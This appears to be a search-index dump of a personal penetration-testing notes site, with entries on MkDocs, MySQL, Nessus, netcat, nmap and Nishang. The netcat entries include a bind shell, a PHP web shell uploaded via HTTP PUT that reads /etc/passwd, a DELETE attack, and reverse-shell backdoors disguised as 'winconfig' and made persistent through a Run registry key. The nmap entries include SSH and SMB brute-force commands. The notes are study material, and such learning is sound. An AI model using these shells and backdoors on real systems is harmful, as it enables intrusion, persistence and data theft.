                        /docs/css/extra.css

                        @page {\n    size: a4 portrait;\n    margin: 25mm 10mm 25mm 10mm;\n    counter-increment: page;\n    font-family: \"Roboto\",\"Helvetica Neue\",Helvetica,Arial,sans-serif;\n    white-space: pre;\n    color: grey;\n    @top-left {\n        content: '\u00a9 2018 My Company';\n    }\n    @top-center {\n        content: string(chapter);\n    }\n    @top-right {\n        content: 'Page ' counter(page);\n    }\n}\n
                        "},{"location":"my-mkdocs-material-customization/#resolving-relative-link-issues-when-rendering","title":"Resolving relative link issues when rendering","text":"

                        https://octoprint.github.io/mkdocs-site-urls/

                        "},{"location":"my-mkdocs-material-customization/#revision-date","title":"Revision date","text":"

                        https://timvink.github.io/mkdocs-git-revision-date-localized-plugin/ ]

                        Install and add to gh-deploy workflow:

                        # Installs git revision date plugin globally\npip install mkdocs-git-revision-date-plugin\n

                        mkdocs.yml

                        # Adding the git revision date plugin\nplugins:\n- search\n- git-revision-date\n    type: timeago \n    timezone: Europe/Amsterdam \n    fallback_to_build_date: false \n    enable_creation_date: true \n    exclude: \n    - index.md \n    enabled: true \n    strict: true\n

                        This plugin needs access to the last commit that touched a specific file to be able to retrieve the date. By default many build environments only retrieve the last commit, which means you might need to:

                        • github actions: set\u00a0fetch-depth\u00a0to\u00a00\u00a0(docs)

                        Types

                        November 28, 2019           # type: date (default)\nNovember 28, 2019 13:57:28  # type: datetime\n2019-11-28                  # type: iso_date\n2019-11-28 13:57:26         # type: iso_datetime\n20 hours ago                # type: timeago\n28. November 2019           # type: custom\n

                        To add a revision date to the default\u00a0mkdocs\u00a0theme, add a\u00a0overrides/partials\u00a0folder to your\u00a0docs\u00a0folder and update your\u00a0mkdocs.yml\u00a0file. Then you can extend the base\u00a0mkdocs\u00a0theme by adding a new file\u00a0docs/overrides/content.html:

                        :octicons-file-code-16: mkdocs.yml
                        ```yaml\ntheme:\n    name: mkdocs\n    custom_dir: docs/overrides\n```\n
                        :octicons-file-code-16: docs/hackinglifetheme/partials/content.html
                        ```html\n<!-- Overwrites content.html base mkdocs theme, taken from \nhttps://github.com/mkdocs/mkdocs/blob/master/mkdocs/themes/mkdocs/content.html -->\n\n{% if page.meta.source %}\n    <div class=\"source-links\">\n    {% for filename in page.meta.source %}\n        <span class=\"label label-primary\">{{ filename }}</span>\n    {% endfor %}\n    </div>\n{% endif %}\n\n{{ page.content }}\n\n<!-- This section adds support for localized revision dates -->\n{% if page.meta.git_revision_date_localized %}\n    <small>Last update: {{ page.meta.git_revision_date_localized }}</small>\n{% endif %}\n{% if page.meta.git_created_date_localized %}\n    <small>Created: {{ page.meta.git_created_date_localized_raw_datetime }}</small>\n{% endif %}\n```\n
                        "},{"location":"mybb-pentesting/","title":"Pentesting MyBB","text":"

                        Once we know we are in front of a MyBB CMS, one useful tool would be MyBBscan.

                        ","tags":["MyBB","pentesting","CMS"]},{"location":"mybb-pentesting/#mybbscan","title":"MyBBScan","text":"

                        Original repo: https://github.com/0xB9/MyBBscan.

                        My forked repo: https://github.com/amandaguglieri/CMS-MyBBscan.

                        ","tags":["MyBB","pentesting","CMS"]},{"location":"mysql/","title":"MySQL","text":"

                        MySQL: MySQL is an open-source relational database management system(RDBMS) based on Structured Query Language (SQL). It is developed and managed by oracle corporation and initially released on 23 may, 1995. It is widely being used in many small and large scale industrial applications and capable of handling a large volume of data. After the acquisition of MySQL by Oracle, some issues happened with the usage of the database and hence MariaDB was developed.

                        By default, MySQL uses\u00a0TCP/3306.

                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#authentication-mechanisms","title":"Authentication Mechanisms","text":"

                        MySQL supports different authentication methods, such as username and password, as well as Windows authentication (a plugin is required).

                        MySQL\u00a0default system schemas/databases:

                        • mysql\u00a0- is the system database that contains tables that store information required by the MySQL server
                        • information_schema\u00a0- provides access to database metadata
                        • performance_schema\u00a0- is a feature for monitoring MySQL Server execution at a low level
                        • sys\u00a0- a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#footprinting-mysql","title":"Footprinting mysql","text":"
                        sudo nmap $ip -sV -sC -p3306 --script mysql*\n
                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#basic-commands","title":"Basic commands","text":"

                        Additionally there are two strings that you can use to comment a line in SQL:

                        • # The hash symbol.
                        • --The two dashes followed by a space-
                        # Show datases\nSHOW databases;\n\n# Show tables\nSHOW tables;\n\n# Create new database\nCREATE DATABASE nameofdatabase;\n\n# Delete database\nDROP DATABASE nameofdatabase;\n\n# Select a database\nUSE nameofdatabase;\n\n# Show tables\u00e7\nSHOW tables;\n\n# Dump columns from nameOftable\nSELECT * FROM NameOfTable;\n# SELECT name, description FROM products WHERE id=9;\n\n# Create a table with some columns in the previously selected database\nCREATE TABLE person(nombre VARCHAR(255), edad INT, id INT);\n\n# Modify, add, or remove a column attribute of a table\nALTER TABLE persona MODIFY edad VARCHAR(200);\nALTER TABLE persona ADD description VARCHAR(200);\nALTER TABLE persona DROP edad VARCHAR(200);\n\n# Insert a new row with values in a table\nINSERT INTO persona VALUES(\"alvaro\", 54, 1);\n
                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#basic-queries","title":"Basic queries","text":"
                        # Show all columns from table\nSELECT * FROM persona\n\n# Select a row from a table filtering by the value of a given column\nSELECT * FROM persona WHERE nombre=\"alvaro\";\n\n# JOIN query\nSELECT * FROM oficina JOIN persona ON persona.id=oficina.user_id;\n\n# UNION query. This means, for an attack, that the number of columns has to be the same\nSELECT * FROM oficina UNION SELECT * from persona;\n\n# Sorting data on the bases on edad column\nSELECT * FROM persona ORDER BY edad;\n\n# Retrieving first record from the table.\nSELECT * from persona order by edad limit 1;\n\n# Count the number of people stored in persona\nSELECT count(*) from persona;\n\n# Context: a wordpress database\n# Identify how many distinct authors have published a post in the blog\nSELECT DISTINCT(post_author) from wpdatabase.wp_posts;\n
                        # UNION Statement syntax\n#<SELECT statement> UNION <other SELECT statement>;\n# Example:\nSELECT name, description FROM products WHERE id=9 UNION SELECT price FROM products WHERE id=9;\n
                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#enumeration-queries","title":"Enumeration queries","text":"
                        # Show current user\ncurrent_user()\nuser()\n\n# Show current database\ndatabase()\n
                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#interact-with-mysql","title":"Interact with MySQL","text":"","tags":["database","relational database","SQL"]},{"location":"mysql/#from-linux","title":"From Linux","text":"
                        mysql -u username -pPassword123 -h $IP\n# -h host/ip   \n# -u user As default mysql has a root user with no authentication\nmysql --host=INSTANCE_IP --user=root --password=thepassword\nmysql -h <host/IP> -u root -p<password>\nmysql -u root -h <host/IP>\n
                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#from-windows","title":"From Windows","text":"
                        mysql.exe -u username -pPassword123 -h $IP\n
                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#gui-application","title":"GUI Application","text":"","tags":["database","relational database","SQL"]},{"location":"mysql/#server-management-studio-or-ssms","title":"Server Management Studio or SSMS","text":"

                        SQL Server Management Studio or SSMS

                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#mysql-workbench","title":"MySQL Workbench","text":"

                        Download from: https://dev.mysql.com/downloads/workbench/.

                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#dbeaver","title":"dbeaver","text":"

                        dbeaver\u00a0is a multi-platform database tool for Linux, macOS, and Windows that supports connecting to multiple database engines such as MSSQL, MySQL, PostgreSQL, among others, making it easy for us, as an attacker, to interact with common database servers.

                        To install\u00a0dbeaver\u00a0using a Debian package we can download the release .deb package from\u00a0https://github.com/dbeaver/dbeaver/releases\u00a0and execute the following command:

                        sudo dpkg -i dbeaver-<version>.deb\n\n# run dbeaver in a second plane\n dbeaver &\n
                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#well-know-vulnerabilities","title":"Well-know vulnerabilities","text":"","tags":["database","relational database","SQL"]},{"location":"mysql/#misconfigurations","title":"Misconfigurations","text":"

                        Anonymous access enabled.

                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#vulnerabilities","title":"Vulnerabilities","text":"

                        MySQL 5.6.x\u00a0servers: \u00a0CVE-2012-2122\u00a0, among others. It allowed us to bypass authentication by repeatedly using the same incorrect password for the given account because the\u00a0timing attack\u00a0vulnerability existed in the way MySQL handled authentication attempts. In this timing attack, MySQL repeatedly attempts to authenticate to a server and measures the time it takes for the server to respond to each attempt. By measuring the time it takes the server to respond, we can determine when the correct password has been found, even if the server does not indicate success or failure.

                        ","tags":["database","relational database","SQL"]},{"location":"mythic/","title":"Mythic C2 Framework","text":"

                        https://github.com/its-a-feature/Mythic

                        The Mythic C2 framework is an alternative option to Metasploit as a Command and Control Framework and toolbox for unique payload generation. A cross-platform, post-exploit, red teaming framework built with GoLang, docker, docker-compose, and a web browser UI. It's designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout red teaming.

                        ","tags":["payloads","tools"]},{"location":"nessus/","title":"Nessus","text":"

                        Nessus has a client and a server. We use the client to configure the scans and the server to actually perform the scanning processes and report back the result to the client.

                        ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"nessus/#installation","title":"Installation","text":"

                        Download .deb from: https://www.tenable.com/downloads/nessus

                        sudo dpkg -i Nessus-10.3.0-debian9_amdb64.deb\nservice nessusd start\n

                        Now you can go to https://localhost:8834

                        Once installed Nessus Esentials, register in the website to generate an API key.

                        Nessus gives us the option to create scan policies. Essentially these are customized scans that allow us to define specific scan options, save the policy configuration, and have them available to us under Scan Templates when creating a new scan.

                        This gives us the ability to create targeted scans for any number of scenarios, such as a slower, more evasive scan, a web-focused scan, or a scan for a particular client using one or several sets of credentials.

                        To exclude false positives from scan results Under the Resources section, we can select Plugin Rules. In the new plugin rule, we input the host to be excluded, along with the Plugin ID for Microsoft DirectAccess, for instance.

                        Nessus gives us the option to export scan results in a variety of report formats as well as the option to export raw Nessus scan results to be imported into other tools, archived, or passed to tools, such as EyeWitness. Nessus gives the option to export scans into two formats Nessus (scan.nessus) or Nessus DB (scan.db). The .nessus file is an .xml file and includes a copy of the scan settings and plugin outputs. The .db file contains the .nessus file and the scan's KB, plugin Audit Trail, and any scan attachments.

                        Scripts such as the nessus-report-downloader can be used to quickly download scan results in all available formats from the CLI using the Nessus REST API:

                        ./nessus_downloader.rb \n
                        ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"nessus/#mitigating-issues","title":"Mitigating Issues","text":"

                        1. Some firewalls will cause us to receive scan results showing either all ports open or no ports open. If this happens, a quick fix is often to configure an Advanced Scan and disable the Ping the remote host option.

                        2. Adjust Performance Options and modify Max Concurrent Checks Per Host if the target host is often under heavy load, such as a widely used web application.

                        3. Unless specifically requested, we should never perform Denial of Service checks. The \"safe checks\" setting allows Nessus users to enable a set of plugins within Nessus' library of vulnerability checks which Tenable feels can have negative effects on the network, device or application being tested.

                        4. It is also essential to keep in mind the potential impact of vulnerability scanning on a network, especially on low bandwidth or congested links. This can be measured using vnstat:

                        ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"netbios/","title":"NetBIOS - Network Basic Input Output System","text":"

                        NetBIOS stands for Network Basic Input Output System. Basically, servers and clients use NetBIOS when viewing network shares on the local area network.

                        NetBIOS supplies hostname, NetBIOS name, Domain, Network shares when querying a computer. When a MS Windows machine browses a network , it uses NetBIOS:

                        • datagrams to list the shares amd the machines (port 138 / UDP)
                        • names to find wrous (port 137 / UDP)
                        • sessions to transmit data to and from a windows share (port 139 / TCP )
                        ","tags":["windows"]},{"location":"netbios/#create-a-network-share-in-a-windows-based-environment","title":"Create a network share in a Windows based environment:","text":"
                        1. Turn on the File and Printer Sharing service.
                        2. Choose directories to share
                        UNC paths (Universal Naming Convention paths) \\\\Servername\\ShareName\\file.nat\n\n\\\\ComputerName\\C$\n\n\\\\ComputerName\\admin$\n\n\\\\ComputerName\\ipc$\u00a0 \u00a0 \u00a0 //inter process communication\n
                        ","tags":["windows"]},{"location":"netcat/","title":"netcat","text":"","tags":["http"]},{"location":"netcat/#installation","title":"Installation","text":"

                        Preinstalled in kali. Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP.

                        For windows: https://nmap.org/ncat/.

                        For linux:

                        sudo apt install ncat\n
                        ","tags":["http"]},{"location":"netcat/#usage","title":"Usage","text":"

                        It\u2019s used for HTTP

                        nc $ip <port> -flags\n
                        ","tags":["http"]},{"location":"netcat/#fingerprinting-with-netcat","title":"Fingerprinting with netcat","text":"
                        nc $ip 80\nHEAD / HTTP/1.0     \n# And hit RETURN twice\n

                        Also, Nmap does not always recognize all information by default. Sometimes you can use netcat to interpelate a service:

                         nc -nv $ip <PORT NUMBER>\n
                        ","tags":["http"]},{"location":"netcat/#netcat-commands","title":"Netcat commands","text":"","tags":["http"]},{"location":"netcat/#as-a-server","title":"As a server","text":"
                        nc -lvp 8888\n#-p: specify a port\n#-l: to listening\n#-v: verbosity\n#-u: enforces udp connection\n#-e: executes the given command\n
                        ","tags":["http"]},{"location":"netcat/#as-a-client","title":"As a client","text":"
                        nc -v $ip <port>\n
                        ","tags":["http"]},{"location":"netcat/#transfer-data","title":"Transfer data","text":"

                        On the server side:

                        #data will be printed on screen\nnc -lvp <port>  \n

                        On the client side:

                        echo \u201chello\u201d | nc -v $ip <port>\n
                        ","tags":["http"]},{"location":"netcat/#transfer-data-and-save-it-in-a-file","title":"Transfer data and save it in a file","text":"

                        On the server side:

                        # Data will be stored in reveived.txt file.\nnc -lvp <port> > received.txt   \n

                        On the client side:

                        echo \u201chello\u201d | nc -v $ip <port>\n
                        ","tags":["http"]},{"location":"netcat/#transfer-file-and-save-it","title":"Transfer file and save it","text":"

                        On the server side:

                        # Received data will be stored in reveived.txt file.\nnc -lvp <port> > received.txt   \n

                        On the client side:

                        cat tobesentfiel.txt | nc -v $ip <port>\n
                        ","tags":["http"]},{"location":"netcat/#netcat-shell","title":"Netcat shell","text":"

                        On the server side:

                        nc -lvp <port> -e /bin/bash\n

                        On the client side:

                        nc -v $ip <port>\n
                        ","tags":["http"]},{"location":"netcat/#some-enumeration-techniques-for-http-verbs","title":"Some enumeration techniques for HTTP verbs","text":"
                        # Send a OPTIONS message with netcat\nnc victim.target 80\nOPTIONS / HTTP/1.0\n
                        ","tags":["http"]},{"location":"netcat/#some-exploitation-techniques-for-http-verbs","title":"Some exploitation techniques for HTTP verbs","text":"","tags":["http"]},{"location":"netcat/#delete-attack","title":"DELETE attack","text":"
                        # General syntax for removing a resource from server using netcat\nnc victim.site 80\nDELETE /path/to/resource.txt HTTP/1.0\n\n\n# Example for removing the login page of a site\nnc victim.site 80\nDELETE /login.php HTTP/1.0\n
                        ","tags":["http"]},{"location":"netcat/#put-attack-getting-a-shell","title":"PUT attack: getting a shell","text":"
                        # Save for instance a php basic shell in a file (shell.php):\n\n<?php \nif (isset($_GET[\u2018cmd\u2019]))\n{\n    $cmd = $_GET[\u2018cmd\u2019];\n    echo \u2018<pre>\u2019;\n    $result = shell_exec($cmd);\n    echo $result;\n    echo \u2018</pre>\u2019;\n?>\n\n\n# Count the size of the file\nwc -m shell.php\n\n# Send with netcat the HTTP verb message\nnc victim.site 80\nPUT /shell.php HTTP/1.0\nConten-type: text/html\nContent-length: [number you got with wc -m payload]\n\n\n# Run the exploit by typing in the browser:\nhttp://victim.site/shell.php?cmd=cat+/etc/passwd\n
                        ","tags":["http"]},{"location":"netcat/#backdoors-with-netcat","title":"Backdoors with netcat","text":"","tags":["http"]},{"location":"netcat/#the-attacker-initiates-the-connection","title":"The attacker initiates the connection","text":"

                        In the victim machine: If windows, get the ncat.exe executable file, rename it to something else such as winconfig and we write in command line:

                        wincofig -l -p <port> -e cmd.exe\n# Example: wincofig -l -p 5555 -e cmd.exe\n

                        In the attacker machine:

                        ncat <victim IP address> <port specified>\n# Example: ncat 192.168.0.40 5555\n
                        ","tags":["http"]},{"location":"netcat/#the-victim-initiates-the-connection","title":"The victim initiates the connection","text":"

                        Great to avoid firewalls!!!

                        In the victim machine: If windows, get the ncat.exe executable file, rename it to something else such as winconfig and we write in command line:

                        winconfig -e cmd.exe <attacker IP> <port>\n# Example: winconfig -e cmd.exe 192.168.1.40 5555\n
                        In the attacker machine:

                        ncat -l -p <port> -v\n# Example: ncat -l -p 5555 -v\n
                        ","tags":["http"]},{"location":"netcat/#creating-a-registry-in-regedit","title":"Creating a registry in regedit","text":"
                        • In regedit, go to Computer\\HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
                        • Right-Button > New > String value
                        • We name it exactly like the ncat.exe file (if we renamed it to winconfig, then we call this registry winconfig>
                        • We edit the registry and we add the path to the executable file and some commands in the Value data:
                        \u201cC:\\Windows/System32\\winconfig.exe <attacker IP> <port> -e cmd.exe\u201d\n# For instance: \u201cC:\\Windows/System32\\winconfig.exe 192.168.1.50 5540 -e cmd.exe\u201d\n
                        ","tags":["http"]},{"location":"netcraft/","title":"netcraft","text":"

                        Netcraft can offer us information about the servers without even interacting with them, and this is something valuable from a passive information gathering point of view. We can use the service by visiting https://sitereport.netcraft.com and entering the target domain. We need to pay special attention to the latest IPs used.

                        Sometimes we can spot the actual IP address from the webserver before it was placed behind a load balancer, web application firewall, or IDS, allowing us to connect directly to it if the configuration.

                        See Information Gathering phase in a Security assessment.

                        ","tags":["web","pentesting","reconnaissance"]},{"location":"netdiscover/","title":"netdiscover - A network enumeration tool based on ARP request","text":"

                        Netdiscover is another discovery tool, built in Kali Linux 2018.2. It performs reconnaissance and discovery on both wireless and switched networks using ARP requests.

                        What is cool about netdiscover? Being nmap a best suited tool for almost everything, netdiscover provides a way to find Internal IP addresses and MAC addresses. That is the difference: netdiscover works only in internal networks.

                        ","tags":["reconnaissance","pentesting"]},{"location":"netdiscover/#installation","title":"Installation","text":"

                        Sometimes, you may be given an outdated kali ova with no netdiscover tool installed. To install:

                        sudo apt-get install netdiscover\n
                        ","tags":["reconnaissance","pentesting"]},{"location":"netdiscover/#basic-commands","title":"Basic commands","text":"
                        # Get help\nnetdiscover -h\n\n# Get all host in an interface and in a range\n# -i: interface\n# -r: range\nnetdiscover -i eth0 -r 192.168.5.42/24 \n
                        ","tags":["reconnaissance","pentesting"]},{"location":"network-traffic-capture/","title":"Network traffic capture tools","text":"","tags":["pentesting","network","toolS"]},{"location":"network-traffic-capture/#some-proxy-tools","title":"Some proxy tools","text":"
                        • Wireshark.
                        • Netmon (Microsoft Network Monitor).
                        • Fiddler: a web debugging proxy.
                        • BurpSuite.
                        • Echo Mirage: for thick clients: freeware tool that hooks into an application\u2019s process and enables us to monitor the network interactions being done.
                        • Postman.
                        ","tags":["pentesting","network","toolS"]},{"location":"nikto/","title":"nikto","text":"

                        You will get some results related to headers such as, for example:

                        • The anti-clickjacking X-Frame-Options header is not present.
                        • The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
                        • The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

                        Run:

                        nikto -h domain.com -o nikto.html -Format html\n\n\nnikto -h http://domain.com/index.php?page=target-page.php -Tuning 5 -Display V\n# -Display V : turn verbose mode on\n# -Tuning 5 : Level 5 is considered aggressive, covering a wide range of tests but may also increase the likelihood of false positives. \n
                        ","tags":["web pentesting","reconnaissance","WSTG-INFO-02"]},{"location":"nishang/","title":"Nishang","text":"

                        Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

                        ","tags":["payloads","tools"]},{"location":"nishang/#installation","title":"Installation","text":"

                        Download from github repo: https://github.com/samratashok/nishang.

                        sudo apt install nishang\n
                        ","tags":["payloads","tools"]},{"location":"nishang/#antak-webshell","title":"Antak Webshell","text":"

                        Antak is a webshell written in ASP.Net which utilizes PowerShell. Active Server Page Extended (ASPX) is a file type/extension written for Microsoft's ASP.NET Framework. Antak is included within the Nishang project.

                        The Antak files can be found in the /usr/share/nishang/Antak-WebShell directory.

                        When uploaded on a http server in the victim machine, Antak web shell functions like a Powershell Console. However, it will execute each command as a new process. It can also execute scripts in memory and encode commands you send.

                        Before uploading Antak you will need to specify the user and password you want to use.

                        ","tags":["payloads","tools"]},{"location":"nmap/","title":"nmap - A network exploration and security auditing tool","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#description","title":"Description","text":"

                        Network Mapper is an open source tool for network exploration and security auditing. Free and open-source scanner created by Gordon Lyon. Nmap is used to discover hosts and services on a computer network by sending packages and analyzing the responses. Another discovery feature is that of operating system detection. These features are extensible by scripts that provide more advanced service detection.

                        nmap <scan types> <options> $ip\n
                        # commonly used\nnmap -sT -Pn --unprivileged --script banner $ip\n\n# enumerate ciphers supported by the application server\nnmap -sT -p 443 -Pn -unprivileged --script ssl-enum-ciphers $ip\n\n# sync-scan the top 10,000 most well-known ports\nnmap -sS $ip --top-ports 10000\n

                        Worthwhile for understanding how packages are sent and received is the --packet-trace option. Also --reason displays the reason for specific result.

                        Also, Nmap does not always recognize all information by default. Sometimes you can use netcat to interpelate a service:

                         nc -nv $ip <PORT NUMBER>\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#cheat-sheet","title":"Cheat Sheet","text":"

                        By default, Nmap will conduct a TCP scan unless specifically requested to perform a UDP scan.

                        nmap 10.0.2.1\nnmap 10.0.2.1/24\nnmap 10.0.2.1-254\nnmap 10.0.*.*\nnmap 10.0.2.1,3,17\nnmap 10.0.2,4.1,3,17\nnmap domain.com\nnmap 10.0.2.1 -p 3389\nnmap 10.0.2.1 -p 80,3389\nnmap 10.0.2.1 -p 50-90\nnmap 10.0.2.1 -p U:53, T:80\n\n# ***** Saving results ******\n# -----------------------------------------\n# -oN: Normal output with .nmap file extension\n# -oG: Grepable output with the .gnmap file extension\n# -oX: XML output  with the .xml file extension\n# -oA: Save results in all formats\n# -oA target: Saves the results in all formats, starting the name of each file with 'target'.\nsudo nmap $ip -oA path/to/target\n\n\n# It forces port enumeration and it's not limited to 1000 ports\nnmap $ip -p-     \n\n# Disables port scanning. If we disable port scan (`-sn`), Nmap automatically ping scan with `ICMP Echo Requests` (`-PE`). Also called ping scan or ping sweep. More reliable that pinging the broadcast address because hosts do not reply to broadcast queries).\nnmap -sn $ip\n\n# Disables DNS resolution.\nnmap -n $ip\n\n# Disables ARP ping.\nnmap $ip --disable-arp-ping\n\n# This option skips the host discovery stage altogether. It deactivates the ICMP echo requests\nnmap  -Pn  $ip  \n\n# Scans top 100 ports.\nnmap  -F  $ip \n\n# Shows the progress of the scan every 5 seconds.\nnmap $ip --stats-every=5s\n\n# To skip host discovery and port scan, while still allowing NMAP Scripting Engine to run, we use -Pn -sn combined.\nnmap -Pn -sn $ip\n\n# OS detection\nnmap -O $ip \n\n# Limit OS detection to promising targets\nnmap -O $ip -osscan-limit\n\n# Guess OS more aggressively\nnmap -O $ip -osscan-guess\n\n# Version detection\nnmap -sV $ip \n\n# Intensity level goes from 0 to 9\nnmap -sV $ip \u2013-version-intensity 8  \n\n# tcpwrapped means that the TCP handshake was completed, \n# but the remote host closed the connection without receiving any data. \n# This means that something is blocking connectivity with the target host. \n\n# OS detection + version detection + script scanning + traceroute\nnmap -A $ip\n\n# Half-open scanning. SYN + SYN ACK + RST\n# A well-configured IDS will still detect the scan\nnmap -sS $ip\n\n# TCP connect scan: SYN + SYN ACK + ACK + DATA (banner) +RST\n# This scan gets recorded in the application logs on the target systems\nnmap -sT $ip\n\n# Scan a list of hosts. One per line in the file\nnmap -sn -iL $ip hosttoscanlist.txt \n\n# List targets to scan\nnmap -sL $ip \n\n# Full scanner\nnmap -sC -sV -p- $ip  \n# The script scan `-sC` flag causes `Nmap` to report the server headers `http-server-header` page and the page title `http-title` for any web page hosted on the webserver.\n\n\n# UDP quick\nnmap -sU -sV  $ip\n\n# Called ACK scan. Returns if the port is filtered or not. Useful to determine if there is a firewall.\nnmap -sA $ip \n\n# It sends a ACK packet. In the response we pay attention to the windows size of the TCP header. If the windows size is different from zero, the port is open. If it is zero, then port is either closed or filtered. \nnmap -sW $ip\n

                        To redirect results to a file > targetfile.txt

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#search-and-run-a-script-in-nmap","title":"Search and run a script in nmap","text":"

                        NSE: Nmap Scripting Engine.

                        # All scripts are located under:\n/usr/share/nmaps/script\n\n\nlocate -r nse$|grep <term>\n# if this doesn\u2019t work, update the db with:\nsudo updatedb\n\n\n# Also:\nlocate scripts/<nameOfservice>\n

                        Run a script:

                        # Run default scripts \nnmap $ip -sC\n\n# Run  scripts from a category. See categories below\nnmap $ip --script <category>\n\n# Run specific scripts\nnmap --script <script-name>,<script-name>,<script-name> -p<port> $ip\n

                        NSE (Nmap Script Engine) provides us with the possibility to create scripts in Lua for interaction with certain services. There are a total of 14 categories into which these scripts can be divided:

                        Category Description auth Determination of authentication credentials. broadcast Scripts, which are used for host discovery by broadcasting and the discovered hosts, can be automatically added to the remaining scans. brute Executes scripts that try to log in to the respective service by brute-forcing with credentials. default Default scripts executed by using the -sC option. Syntax: sudo nmap $ip -sC discovery Evaluation of accessible services. dos These scripts are used to check services for denial of service vulnerabilities and are used less as it harms the services. exploit This category of scripts tries to exploit known vulnerabilities for the scanned port. external Scripts that use external services for further processing. fuzzer This uses scripts to identify vulnerabilities and unexpected packet handling by sending different fields, which can take much time. intrusive Intrusive scripts that could negatively affect the target system. malware Checks if some malware infects the target system. safe Defensive scripts that do not perform intrusive and destructive access. version Extension for service detection. vuln Identification of specific vulnerabilities.","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#general-vulnerability-assessment","title":"General vulnerability assessment","text":"
                        sudo nmap $ip -p 80 -sV --script vuln \n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#port-21-footprinting-ftp","title":"Port 21: footprinting FTP","text":"
                        # Locate all ftp scripts related\nfind / -type f -name ftp* 2>/dev/null | grep scripts\n\n# Run a general scanner for version, mode aggresive and perform default scripts\nsudo nmap -sV -p21 -sC -A $ip\n# ftp-anon NSE script checks whether the FTP server allows anonymous access.\n# ftp-syst, for example, executes the `STAT` command, which displays information about the FTP server status.\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#port-22-attack-a-ssh-connection","title":"Port 22: attack a ssh connection","text":"
                        nmap $ip -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=/usr/share/nmap/nselib/data/passwords.lst\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#ports-137-138-139-445-footprinting-smb","title":"Ports 137, 138, 139, 445: footprinting SMB","text":"
                        sudo nmap $ip -sV -sC -p139,445\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#grab-banners-of-services","title":"Grab banners of services","text":"
                        # Grab banner of services in an IP\nnmap -sV --script=banner $ip\n\n# Grab banners of services in a range\nnmap -sV --script=banner $ip/24\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#enumerate-samba-service-smb","title":"Enumerate samba service (smb)","text":"
                        # 1. Search for existing script for smb enumeration\nlocate -r nse$|grep <term>\n\n# 2. Select smb-enum-shares and run it\nnmap -script=smb-enum-shares $ip\n\n# 3. Retrieve users\nnmap -script=smb-enum-users $ip\n\n# 4. Retrieve groups with passwords and user\nnmap -script=smb-brute $ip\n\n# Interact with the SMB service to extract the reported operating system version\nnmap --script smb-os-discovery.nse -p445 $ip\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#performance","title":"Performance","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#introducing-delays-or-timeouts","title":"Introducing delays or Timeouts","text":"

                        When Nmap sends a packet, it takes some time (Round-Trip-Time - RTT) to receive a response from the scanned port. Generally, Nmap starts with a high timeout (--min-RTT-timeout) of 100ms.

                        # While connecting to the service, we noticed that the connection took longer than usual (about 15 seconds). There are some services whose connection speed, or response time, can be configured. Now that we know that an FTP server is running on this port, we can deduce the origin of our \"failed\" scan. We could confirm this again by specifying the minimum `probe round trip time` (`--min-rtt-timeout`) in Nmap to 15 or 20 seconds and rerunning the scan.\nnmap $IP --min-rtt-timeout 15\n\n# Optimized RTT\nsudo nmap IP/24 -F --initial-rtt-timeout 50ms --max-rtt-timeout 100ms\n# -F: Scans top 100 ports.\n# --initial-rtt-timeout 50ms: Sets the specified time value as initial RTT timeout.\n# --max-rtt-timeout 100ms: Sets the specified time value as maximum RTT timeout.\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#max-retries","title":"Max Retries","text":"

                        The default value for the retry rate is 10, so if Nmap does not receive a response for a port, it will not send any more packets to the port and will be skipped.

                        sudo nmap $ip/24 -F --max-retries 0\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#rates","title":"Rates","text":"

                        When setting the minimum rate (--min-rate) for sending packets, we tell Nmap to simultaneously send the specified number of packets.

                        sudo nmap $ip/24 -F --min-rate 300\n# --min-rate 300 Sets the minimum number of packets to be sent per second.\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#timing","title":"Timing","text":"

                        Nmap offers six different timing templates (-T <0-5>), being defaul one, -T 3.

                        Flag Mode -T 0 Paranoid -T 1 Sneaky -T 2 Polite -T 3 Normal -T 4 Aggressive -T 5 Insane

                        More on nmap documentation.

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#firewall-and-idsips-evasion-with-nmap","title":"Firewall and IDS/IPS Evasion with nmap","text":"

